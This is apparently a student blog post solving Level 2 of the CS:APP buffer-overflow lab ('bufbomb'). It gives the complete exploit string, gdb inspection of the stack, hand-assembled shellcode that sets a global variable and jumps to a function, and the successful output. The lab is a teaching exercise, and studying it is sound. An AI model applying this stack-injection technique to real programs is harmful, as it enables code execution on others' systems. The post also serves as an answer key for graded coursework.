level 0 and level 1 are in my blog please check them out if you have no idea of what I am trying to approach
Level 2: Firecracker
A much more sophisticated form of buffer attack involves supplying a string that encodes actual machine in-
structions. The exploit string then overwrites the return pointer with the starting address of these instructions
on the stack. When the calling function (in this case getbuf) executes its ret instruction, the program
will start executing the instructions on the stack rather than returning. With this form of attack, you can get
the program to do almost anything. The code you place on the stack is called the exploit code. This style of
attack is tricky, though, because you must get machine code onto the stack and set the return pointer to the
start of this code
to start with
What do you have to know are:
1 your cookie number: <=wish you already known
2 your exploit address :<= the return address of the bufffer overflow
3 your global_value address: <= it assign to be 0x00 so you have to replace your cookie to this address
So first start :
it similar idea to phase 0 and 1 to solve this :
Within the file bufbomb there is a function bang having the following C code:
int global_value = 0;
void bang(int val)
{
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
first: generate your exploit string bang.txt file
[plueonde@bert buflab-handout]$ vim bang.txt
in vim you can use any number to keep track of your string I personally use 61 for letter a for 36 times I add 30 four times to generate my overflow total of 40 characters long
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 30 30 30 30
save and quit vim, Then translate to string in hex2raw out put in bang-raw
so after we have bang-raw.txt file we have to use it in gdb to see the address of our overflow addres
[plueonde@bert buflab-handout]$ ./hex2raw < bang.txt > bang-raw.txt
[plueonde@bert buflab-handout]$ gdb bufbomb
GNU gdb (GDB) Red Hat Enterprise Linux (7.0.1-45.el5)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-redhat-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb...(no debugging symbols found)...done.
(gdb) b *getbuf+17
Breakpoint 1 at 0x8049093
(gdb) r -u plueon2 < bang-raw.txt
Starting program: /mnt_nfs/home3/ugrad3/plueonde/Downloads/buflab-handout/bufbomb -u plueon2 < bang-raw.txt
Userid: plueon2
Cookie: 0x34fd7256
Breakpoint 1, 0x08049093 in getbuf ()(gdb) disas bang
Dump of assembler code for function bang:
0x08048c0b <bang+0>: push %ebp <= bang function address
0x08048c0c <bang+1>: mov %esp,%ebp
0x08048c0e <bang+3>: sub $0x8,%esp
0x08048c11 <bang+6>: mov 0x804c1ec,%eax <= global_value address
0x08048c16 <bang+11>: cmp 0x804c1e4,%eax
0x08048c1c <bang+17>: jne 0x8048c3c <bang+49>
0x08048c1e <bang+19>: mov %eax,0x4(%esp)
0x08048c22 <bang+23>: movl $0x804a064,(%esp)
0x08048c29 <bang+30>: call 0x8048870 <printf@plt>
0x08048c2e <bang+35>: movl $0x2,(%esp)
0x08048c35 <bang+42>: call 0x80490a0 <validate>
0x08048c3a <bang+47>: jmp 0x8048c4c <bang+65>
0x08048c3c <bang+49>: mov %eax,0x4(%esp)
0x08048c40 <bang+53>: movl $0x804a19f,(%esp)
0x08048c47 <bang+60>: call 0x8048870 <printf@plt>
0x08048c4c <bang+65>: movl $0x0,(%esp)
0x08048c53 <bang+72>: call 0x8048930 <exit@plt>
End of assembler dump.
(gdb) x/20wx $esp <= look at your $esp in 20 words
0x55682f88 <_reserved+1036168>: 0x55682f90 0x006cd736 0x61616161 0x61616161
0x55682f98 <_reserved+1036184>: 0x61616161 0x61616161 0x61616161 0x61616161
0x55682fa8 <_reserved+1036200>: 0x61616161 0x61616161 0x61616161 0x30303030: end
0x55682fb8 <_reserved+1036216>: 0x007f9f00 0x55686018 0x00000000 0x55682fe0
^^overflow address
0x55682fc8 <_reserved+1036232>: 0x006e7ce3 0x007fa4c0 0x0804a22e 0x55682fec
(gdb) quit
quit your gdb and now create your exploit buffer overflow file replace 30 30 30 30 by the overflow address
[plueonde@bert buflab-handout]$ vim bang.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 b8 2f 68 55
Then generate the assembly.s
[plueonde@bert buflab-handout]$ vim assembly.s
movl $0x34fd7256,0x804c1ec #move cookie to global value address
push $0x08048c0b # push it into the bang address
ret # return
save quit and compile it
[plueonde@bert buflab-handout]$ gcc -c assembly.s
[plueonde@bert buflab-handout]$ objdump -d assembly.o > assembly.d
[plueonde@bert buflab-handout]$ cat assembly.d
assembly.o: file format elf64-x86-64
Disassembly of section .text:
0000000000000000 <.text>:
0: c7 04 25 ec c1 04 08 movl $0x34fd7256,0x804c1ec
7: 56 72 fd 34
b: 68 0b 8c 04 08 pushq $0x8048c0b
10: c3 retq
[plueonde@bert buflab-handout]$ coppy the instruction and add it to the bang.txt
[plueonde@bert buflab-handout]$ vim bang.txt
61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 b8 2f 68 55 c7 04 25 ec c1 04 08 56 72 fd 34 68 0b 8c 04 08 c3
save and quit and try it out
[plueonde@bert buflab-handout]$ ./hex2raw < bang.txt > bang-raw.txt
[plueonde@bert buflab-handout]$ ./bufbomb -u plueon2 < bang-raw.txt
Userid: plueon2
Cookie: 0x34fd7256
Type string:Bang!: You set global_value to 0x34fd7256
VALID
NICE JOB!
congratulation.....
This comment has been removed by the author.
ReplyDelete